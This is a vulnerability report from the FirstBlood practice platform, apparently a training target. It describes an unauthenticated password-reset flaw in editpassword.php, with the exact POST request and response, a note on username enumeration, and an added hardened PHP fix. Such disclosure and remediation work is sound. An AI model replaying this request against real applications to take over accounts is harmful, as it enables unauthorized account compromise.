FirstBlood-#383 — Edit password functionality can be used to reset password of any user
This issue was discovered on FirstBlood v2.0.0 (issues patched)
On 2021-10-25, sumyth Level 2 reported:
Please find a brief description of the vulnerability below:
In firstblood.com there exists functionality which can be used to reset the password of any user/doctor present on the website without even being authenticated.
Steps to reproduce:
- Generate the following POST request with a username of your choice:

POST /drpanel/drapi/editpassword.php HTTP/1.1
Host: 15c5a8ff7386-sumyth.a.firstbloodhackers.com
Sec-Ch-Ua: ";Not A Brand";v="99", "Chromium";v="94"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://15c5a8ff7386-sumyth.a.firstbloodhackers.com/drpanel/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

username=drAdmin

- Send the request to the server. Observe that the server responds with a new password for the user without performing any authorization check:

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Oct 2021 15:58:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - bL9TfVhgA5Oxs46
Having password-changing functionality without any kind of authorization allows an attacker to reset the password of any user on the website, which leads to account compromise.
Endpoint: /drpanel/drapi/editpassword.php
This bug makes use of the following vulnerabilities in a chain:
FirstBlood ID: 28
Vulnerability Type: Auth issues
The endpoint /drapi/editpassword can actually be accessed unauthenticated.
FirstBlood ID: 27
Vulnerability Type: Application/Business Logic
It is possible to edit the admin's password (drAdmin) from /drapi/editpassword as it only looks at the username. Usernames can be enumerated when logging in, as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.
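The fix for this chain is to bind the password change to an authenticated session rather than to a caller-supplied username. The handler below is an added example of that shape, not FirstBlood's own editpassword.php; the session key `doctor_id`, the `doctors` table, the `csrf_token` field and the SQLite DSN are assumptions.

```php
<?php
// Added example: hardened replacement for an editpassword.php-style handler.
// The reported endpoint had two defects: no session check at all, and the
// target account taken from the 'username' POST field. Both are closed here.
declare(strict_types=1);
session_start();

function deny(int $status, string $msg): void {
    http_response_code($status);
    header('Content-Type: text/plain');
    echo $msg;
    exit;
}

// 1. Authentication: unauthenticated callers never reach the update.
//    ('doctor_id' is an assumed session key, set at login.)
if (empty($_SESSION['doctor_id'])) {
    deny(401, 'Authentication required');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    deny(405, 'Method not allowed');
}
// CSRF guard, since the endpoint is cookie-authenticated (assumed token field).
if (!hash_equals($_SESSION['csrf_token'] ?? '', $_POST['csrf_token'] ?? '')) {
    deny(403, 'Invalid request token');
}

// 2. Authorization: the account changed is the session's own. The 'username'
//    POST parameter is ignored, so a caller cannot name another user.
$doctorId = (int) $_SESSION['doctor_id'];
$pdo = new PDO('sqlite:firstblood.db');   // assumed DSN
$stmt = $pdo->prepare('SELECT password_hash FROM doctors WHERE id = :id');
$stmt->execute([':id' => $doctorId]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);

// Re-authenticate with the current password before issuing a new one.
if ($row === false || !password_verify($_POST['current_password'] ?? '', $row['password_hash'])) {
    deny(403, 'Current password incorrect');
}

// 3. Generate the new password with a CSPRNG and store only its hash.
$newPassword = rtrim(strtr(base64_encode(random_bytes(12)), '+/', '-_'), '=');
$upd = $pdo->prepare('UPDATE doctors SET password_hash = :h WHERE id = :id');
$upd->execute([':h' => password_hash($newPassword, PASSWORD_DEFAULT), ':id' => $doctorId]);

// Server-side audit trail so a reset of any account is detectable.
error_log(sprintf('password changed for doctor id %d from %s', $doctorId, $_SERVER['REMOTE_ADDR']));
header('Content-Type: text/plain');
echo 'Password updated - ' . $newPassword;
```

With this shape, a request carrying only `username=drAdmin` and no valid session cookie gets a 401, which is also the response a detection rule for this endpoint should expect to see on anonymous traffic.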